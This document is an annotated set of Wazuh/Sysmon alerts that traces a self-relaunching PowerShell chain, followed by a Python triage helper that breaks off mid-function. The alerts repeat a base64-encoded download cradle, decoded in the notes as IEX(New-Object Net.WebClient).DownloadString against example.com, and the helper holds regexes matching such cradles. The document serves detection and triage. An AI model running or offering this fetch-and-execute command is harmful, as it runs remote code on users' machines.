data.win.system.processID: 3712 PID of the writer, i.e. the Sysmon service (3712 in every record here), not the process the alert is about. The subject's PID is data.win.eventdata.processId.
data.win.system.threadID: 4740 Thread inside the Sysmon service that wrote the record. Not the subject's thread.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational Event log channel the agent subscribed to.
data.win.system.computer: Attacker Hostname that logged the event. Should match agent.name; a mismatch means forwarded events or a mislabelled agent.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR). Informational for every ordinary Sysmon event; the rule, not this field, sets priority.
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:56:39.935
ProcessGuid: {94294ddc-c1a7-680a-040d-000000000e00}
ProcessId: 12292
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-c1a3-680a-010d-000000000e00}
ParentProcessId: 3616
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" Rendered message text; same content as the data.win.eventdata.* fields below. Note that ParentCommandLine is identical to CommandLine and ParentProcessId 3616 is the processId of the EID 11 above: the parent carried the same payload, so this is one link in a self-relaunch chain.
data.win.eventdata.utcTime: 2025-04-24 22:56:39.935 Sysmon's UTC timestamp for the process start, millisecond precision. Sequence by this, not by data.win.system.systemTime.
data.win.eventdata.processGuid: {94294ddc-c1a7-680a-040d-000000000e00} Sysmon process GUID, never reused. The EID 11 that follows and the next EID 1's parentProcessGuid both carry this value; join on it.
data.win.eventdata.processId: 12292 Windows PID. Recycled after exit; pivot on processGuid.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Executable launched. Backslashes are doubled by Wazuh's JSON escaping.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Version resource of the image: the OS copy of Windows PowerShell on build 26100. A stock version string plus a known hash says the binary itself is genuine.
data.win.eventdata.description: Windows PowerShell From the PE version resource. Easy to forge in a custom binary; corroborate with hashes.
data.win.eventdata.product: Microsoft® Windows® Operating System From the PE version resource.
data.win.eventdata.company: Microsoft Corporation From the PE version resource.
data.win.eventdata.originalFileName: PowerShell.EXE Name compiled into the binary. Survives a rename on disk, so compare it with image to catch powershell.exe copied to an innocent name.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA Full command line. powershell.exe is handed its own path as the first argument, then -NoLogo -NoProfile -EncodedCommand. The blob is base64 of UTF-16LE text (hence the run of A characters) and decodes to IEX(New-Object Net.WebClient).DownloadString('https://example.com/test'): fetch a script over HTTPS and run it in memory. Decode this before anything else.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ Working directory of the new process, the user's profile root here.
data.win.eventdata.user: Attacker\\Attcker1 Account the process runs as. Local account (domain part equals the computer name).
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} Identifies the logon session. Join to the Security 4624 event with the same logon ID to see how Attcker1 got onto the box.
data.win.eventdata.logonId: 0x26584 Logon session ID. Every process of this session, and the 4624 that created it, carry the same value.
data.win.eventdata.terminalSessionId: 1 1 = first interactive desktop session. 0 would mean a service; a higher number usually means a remote desktop session.
data.win.eventdata.integrityLevel: Medium Medium = standard user token, not elevated. High would mean an admin token; watch for it flipping to High in a later child.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC Hash of the image (powershell.exe), not of the script. Confirms a stock Microsoft binary; the payload exists only in the command line.
data.win.eventdata.parentProcessGuid: {94294ddc-c1a3-680a-010d-000000000e00} GUID of the parent; matches the processGuid of the EID 11 above for PID 3616. Join on this, not on PID.
data.win.eventdata.parentProcessId: 3616 Parent PID.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Parent executable: powershell.exe again.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA Identical to commandLine. The parent ran the same encoded payload, so this is a self-relaunch, not a new stage.
data.win.eventdata.parentUser: Attacker\\Attcker1 Account of the parent; same user and session.
location: EventChannel Wazuh log source. EventChannel is the agent's Windows Event Log reader; the actual log is in data.win.system.channel.
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read it against targetFilename before acting: here the file is __PSScriptPolicyTest_<random>.ps1, which PowerShell writes to %TEMP% at startup to test AppLocker/WDAC script enforcement. That is PowerShell's own noise, not an ingress tool transfer; the EID 1 that launched this PowerShell is the real lead.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 137 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535404.2898927 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon ETW provider that wrote the event. Sysmon, so the data fields follow Sysmon's schema, not the Security log's.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} Sysmon's fixed provider GUID. Filter on it to pull Sysmon events only.
data.win.system.eventID: 11 Sysmon event ID, not a Security-log number: 11 = FileCreate.
data.win.system.version: 2 Schema version of this event type (EID 11 is at v2 here). Field layout changes between versions, so check it when a parser breaks.
data.win.system.level: 4 4 = Informational. Sysmon logs ordinary events at this level; the alert's priority comes from the Wazuh rule, not from here.
data.win.system.task: 11 Task category. For Sysmon it simply mirrors the event ID.
data.win.system.opcode: 0 Low‑level opcode (0 = Info). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:56:41.7268408Z When the record was written to the log (UTC). About 50 ms after the event's own utcTime here; sequence by utcTime, not by this.
data.win.system.eventRecordID: 350944 Incremental record number in the channel – handy for timeline order. Immediately follows the EID 1 record 350943.
data.win.system.processID: 3712 PID of the writer, i.e. the Sysmon service (3712 in every record here), not the process the alert is about. The subject's PID is data.win.eventdata.processId.
data.win.system.threadID: 4740 Thread inside the Sysmon service that wrote the record. Not the subject's thread.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational Event log channel the agent subscribed to.
data.win.system.computer: Attacker Hostname that logged the event. Should match agent.name; a mismatch means forwarded events or a mislabelled agent.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR). Informational for every ordinary Sysmon event; the rule, not this field, sets priority.
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:56:41.676
ProcessGuid: {94294ddc-c1a7-680a-040d-000000000e00}
ProcessId: 12292
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_kteidnpa.tvp.ps1
CreationUtcTime: 2025-04-24 22:56:41.676
User: Attacker\Attcker1" Rendered message text of the EID 11; same content as the data.win.eventdata.* fields below.
data.win.eventdata.utcTime: 2025-04-24 22:56:41.676 Sysmon's UTC timestamp for the file creation, about 1.7 s after the same process was created. Sequence by this, not by data.win.system.systemTime.
data.win.eventdata.processGuid: {94294ddc-c1a7-680a-040d-000000000e00} Same GUID as the EID 1 above for PID 12292: the encoded-command PowerShell wrote this file. Join on it.
data.win.eventdata.processId: 12292 Windows PID of the writer. Recycled after exit; pivot on processGuid.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Executable that created the file. Backslashes doubled by Wazuh's JSON escaping.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_kteidnpa.tvp.ps1 File created. __PSScriptPolicyTest_<random>.ps1 in %TEMP% is PowerShell's own AppLocker/WDAC policy probe written at startup, one per launch; not a payload.
data.win.eventdata.creationUtcTime: 2025-04-24 22:56:41.676 Equal to utcTime: a fresh file, not an overwrite.
data.win.eventdata.user: Attacker\\Attcker1 Account the process ran as; local account on this host.
location: EventChannel Wazuh log source. EventChannel is the agent's Windows Event Log reader; the actual log is in data.win.system.channel.
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Same rule as the previous EID 1 alert, one link further down the chain: PID 10312 spawned by 12292 with the same encoded download cradle.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 134 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535407.2901696 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon ETW provider that wrote the event. Sysmon, so the data fields follow Sysmon's schema, not the Security log's.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} Sysmon's fixed provider GUID. Filter on it to pull Sysmon events only.
data.win.system.eventID: 1 Sysmon event ID, not a Security-log number: 1 = Process Create (4688 is the Security-log counterpart).
data.win.system.version: 5 Schema version of this event type (EID 1 is at v5 here).
data.win.system.level: 4 4 = Informational. Priority comes from the Wazuh rule, not from here.
data.win.system.task: 1 Task category. For Sysmon it simply mirrors the event ID.
data.win.system.opcode: 0 Low‑level opcode (0 = Info). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:56:45.6413370Z When the record was written to the log (UTC). About 2.7 s after the event's own utcTime here; sequence by utcTime, not by this.
data.win.system.eventRecordID: 350971 Incremental record number in the channel – handy for timeline order. The 26 records between 350944 and this one are Sysmon events that no rule promoted to an alert.
data.win.system.processID: 3712 PID of the writer, i.e. the Sysmon service, not the process the alert is about. The subject's PID is data.win.eventdata.processId.
data.win.system.threadID: 4740 Thread inside the Sysmon service that wrote the record. Not the subject's thread.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational Event log channel the agent subscribed to.
data.win.system.computer: Attacker Hostname that logged the event. Should match agent.name.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR). Informational for every ordinary Sysmon event; ignore it for triage.
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:56:42.931
ProcessGuid: {94294ddc-c1aa-680a-060d-000000000e00}
ProcessId: 10312
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-c1a7-680a-040d-000000000e00}
ParentProcessId: 12292
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" Rendered message text; same content as the data.win.eventdata.* fields below. ParentProcessId 12292 is the processId of the previous EID 1 and ParentCommandLine equals CommandLine: second link of the self-relaunch chain.
data.win.eventdata.utcTime: 2025-04-24 22:56:42.931 Sysmon's UTC timestamp for the process start, about 3 s after the parent started. Sequence by this, not by data.win.system.systemTime.
data.win.eventdata.processGuid: {94294ddc-c1aa-680a-060d-000000000e00} Sysmon process GUID, never reused. The EID 11 that follows and the next EID 1's parentProcessGuid both carry this value.
data.win.eventdata.processId: 10312 Windows PID. Recycled after exit; pivot on processGuid.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Executable launched. Backslashes doubled by Wazuh's JSON escaping.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Version resource of the image: the OS copy of Windows PowerShell, same as the parent.
data.win.eventdata.description: Windows PowerShell From the PE version resource. Easy to forge in a custom binary; corroborate with hashes.
data.win.eventdata.product: Microsoft® Windows® Operating System From the PE version resource.
data.win.eventdata.company: Microsoft Corporation From the PE version resource.
data.win.eventdata.originalFileName: PowerShell.EXE Name compiled into the binary. Survives a rename on disk; compare with image.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA Full command line, byte for byte the same as the earlier alerts: base64 of UTF-16LE for IEX(New-Object Net.WebClient).DownloadString('https://example.com/test'), with powershell.exe handed its own path as the first argument.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ Working directory of the new process, the user's profile root.
data.win.eventdata.user: Attacker\\Attcker1 Account the process runs as; local account on this host.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} Same logon session as the parent. Join to the Security 4624 event with this logon ID to see how the session began.
data.win.eventdata.logonId: 0x26584 Logon session ID, unchanged along the chain: no new logon, no token swap.
data.win.eventdata.terminalSessionId: 1 1 = first interactive desktop session. 0 would mean a service.
data.win.eventdata.integrityLevel: Medium Medium = standard user token, not elevated. Still Medium, so no privilege escalation so far.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC Hash of the image (powershell.exe), not of the script. Same stock binary as the parent.
data.win.eventdata.parentProcessGuid: {94294ddc-c1a7-680a-040d-000000000e00} GUID of the parent; matches the processGuid of the EID 1 for PID 12292 above. Join on this, not on PID.
data.win.eventdata.parentProcessId: 12292 Parent PID.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Parent executable: powershell.exe again.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA Identical to commandLine: self-relaunch, not a new stage.
data.win.eventdata.parentUser: Attacker\\Attcker1 Account of the parent; same user and session.
location: EventChannel Wazuh log source. EventChannel is the agent's Windows Event Log reader; the actual log is in data.win.system.channel.
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Same artifact as the previous 92213 hit, now from PID 10312: one __PSScriptPolicyTest_*.ps1 per PowerShell launch is expected, so the count tracks the chain, not a payload drop.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 138 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535407.2909767 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon ETW provider that wrote the event. Sysmon, so the data fields follow Sysmon's schema, not the Security log's.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} Sysmon's fixed provider GUID. Filter on it to pull Sysmon events only.
data.win.system.eventID: 11 Sysmon event ID, not a Security-log number: 11 = FileCreate.
data.win.system.version: 2 Schema version of this event type (EID 11 is at v2 here).
data.win.system.level: 4 4 = Informational. Priority comes from the Wazuh rule, not from here.
data.win.system.task: 11 Task category. For Sysmon it simply mirrors the event ID.
data.win.system.opcode: 0 Low‑level opcode (0 = Info). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:56:45.8540677Z When the record was written to the log (UTC). About 13 ms after the event's own utcTime here; sequence by utcTime, not by this.
data.win.system.eventRecordID: 350972 Incremental record number in the channel – handy for timeline order. Immediately follows the EID 1 record 350971.
data.win.system.processID: 3712 PID of the writer, i.e. the Sysmon service, not the process the alert is about. The subject's PID is data.win.eventdata.processId.
data.win.system.threadID: 4740 Thread inside the Sysmon service that wrote the record. Not the subject's thread.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational Event log channel the agent subscribed to.
data.win.system.computer: Attacker Hostname that logged the event. Should match agent.name.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR). Informational for every ordinary Sysmon event; ignore it for triage.
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:56:45.841
ProcessGuid: {94294ddc-c1aa-680a-060d-000000000e00}
ProcessId: 10312
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_zaf4aluj.1ni.ps1
CreationUtcTime: 2025-04-24 22:56:45.841
User: Attacker\Attcker1" Rendered message text of the EID 11; same content as the data.win.eventdata.* fields below.
data.win.eventdata.utcTime: 2025-04-24 22:56:45.841 Sysmon's UTC timestamp for the file creation, about 2.9 s after PID 10312 started. Sequence by this, not by data.win.system.systemTime.
data.win.eventdata.processGuid: {94294ddc-c1aa-680a-060d-000000000e00} Same GUID as the EID 1 above for PID 10312: the encoded-command PowerShell wrote this file. Join on it.
data.win.eventdata.processId: 10312 Windows PID of the writer. Recycled after exit; pivot on processGuid.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Executable that created the file. Backslashes doubled by Wazuh's JSON escaping.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_zaf4aluj.1ni.ps1 File created. Third __PSScriptPolicyTest_<random>.ps1 of the chain: PowerShell's own AppLocker/WDAC policy probe, written once per launch; not a payload.
data.win.eventdata.creationUtcTime: 2025-04-24 22:56:45.841 Equal to utcTime: a fresh file, not an overwrite.
data.win.eventdata.user: Attacker\\Attcker1 Account the process ran as; local account on this host.
location: EventChannel Wazuh log source. EventChannel is the agent's Windows Event Log reader; the actual log is in data.win.system.channel.
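Added example, not part of the original page and not Wazuh or Sysmon code: the helpers below do the three checks the alerts above call for. They decode the -EncodedCommand blob from the command line, pull out the download-cradle indicators, walk the EID 1 records on this page by ProcessGuid (PIDs 3616, 12292, 10312 and 11220, identical command lines, each the parent of the next) and recognise the __PSScriptPolicyTest files behind the 92213 hits. The records and the command line are constructed from the alert fields on this page; the function names and the indicator patterns are assumptions of this example, not Wazuh's.

```python
"""Triage helpers for the Sysmon EID 1 / EID 11 alerts on this page.

Added example (not Wazuh, Sysmon or the page's own code). Sample records are
constructed from the alert fields shown above, trimmed to what is needed.
"""
import base64
import re

# Sysmon EID 1 (Process Create) records, constructed from the alerts above.
EID1_RECORDS = [
    {"utcTime": "2025-04-24 22:56:39.935", "processId": 12292,
     "processGuid": "{94294ddc-c1a7-680a-040d-000000000e00}",
     "parentProcessId": 3616,
     "parentProcessGuid": "{94294ddc-c1a3-680a-010d-000000000e00}"},
    {"utcTime": "2025-04-24 22:56:42.931", "processId": 10312,
     "processGuid": "{94294ddc-c1aa-680a-060d-000000000e00}",
     "parentProcessId": 12292,
     "parentProcessGuid": "{94294ddc-c1a7-680a-040d-000000000e00}"},
    {"utcTime": "2025-04-24 22:56:47.245", "processId": 11220,
     "processGuid": "{94294ddc-c1af-680a-080d-000000000e00}",
     "parentProcessId": 10312,
     "parentProcessGuid": "{94294ddc-c1aa-680a-060d-000000000e00}"},
]

# CommandLine shared by all three EID 1 records above.
COMMAND_LINE = (
    '"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    '"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    "-NoLogo -NoProfile -EncodedCommand "
    "SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4A"
    "RABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwA"
    "ZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA"
)

# -EncodedCommand and every abbreviation PowerShell accepts (-e, -ec, -enc, ...).
_ENC_SWITCH = re.compile(r'(?:^|\s)-(e[a-z]*)\s+"?([A-Za-z0-9+/=]{8,})', re.IGNORECASE)


def decode_encoded_commands(cmdline):
    """Return the script(s) hidden behind -EncodedCommand on a command line.

    PowerShell expects base64 of UTF-16LE text, which is why the blob above is
    full of 'A' characters: every other byte is 0x00.
    """
    scripts = []
    for switch, blob in _ENC_SWITCH.findall(cmdline):
        sw = switch.lower()
        if sw != "ec" and not "encodedcommand".startswith(sw):
            continue  # -ExecutionPolicy, -ErrorAction and friends
        try:
            scripts.append(base64.b64decode(blob, validate=True).decode("utf-16-le"))
        except (ValueError, UnicodeDecodeError):
            continue  # not a valid encoded command; leave it for manual review
    return scripts


# Download-cradle building blocks; each indicator name maps to a pattern.
_CRADLE = {
    "invoke-expression": re.compile(r"\bIEX\b|Invoke-Expression", re.IGNORECASE),
    "webclient": re.compile(r"Net\.WebClient|Invoke-WebRequest|\biwr\b|Invoke-RestMethod", re.IGNORECASE),
    "download": re.compile(r"Download(?:String|File|Data)", re.IGNORECASE),
    "url": re.compile(r'https?://[^\s\'")]+', re.IGNORECASE),
}


def cradle_indicators(script):
    """Map indicator name -> matches found in a decoded script (empty if none)."""
    return {name: rx.findall(script) for name, rx in _CRADLE.items() if rx.search(script)}


def process_chain(records, leaf_guid):
    """PIDs from the outermost known ancestor down to leaf_guid.

    Walks parentProcessGuid rather than PID: PIDs are recycled, GUIDs are not.
    The walk stops at the first parent with no EID 1 record of its own; its PID
    is still known from the child's parentProcessId and heads the chain.
    """
    by_guid = {r["processGuid"]: r for r in records}
    chain, seen, cur = [], set(), by_guid.get(leaf_guid)
    while cur is not None and cur["processGuid"] not in seen:
        seen.add(cur["processGuid"])
        chain.append(cur["processId"])
        parent = by_guid.get(cur["parentProcessGuid"])
        if parent is None:
            chain.append(cur["parentProcessId"])
        cur = parent
    chain.reverse()
    return chain


# PowerShell writes this file to %TEMP% at startup to test AppLocker/WDAC
# script enforcement. It is PowerShell's own noise, not a dropped payload.
_POLICY_PROBE = re.compile(r"\\Temp\\__PSScriptPolicyTest_[^\\]+\.ps1$", re.IGNORECASE)


def is_ps_policy_probe(target_filename):
    """True for the __PSScriptPolicyTest_<random>.ps1 startup artifact.

    Wazuh renders paths with doubled backslashes (JSON escaping); both forms
    are accepted.
    """
    return _POLICY_PROBE.search(target_filename.replace("\\\\", "\\")) is not None


if __name__ == "__main__":
    for script in decode_encoded_commands(COMMAND_LINE):
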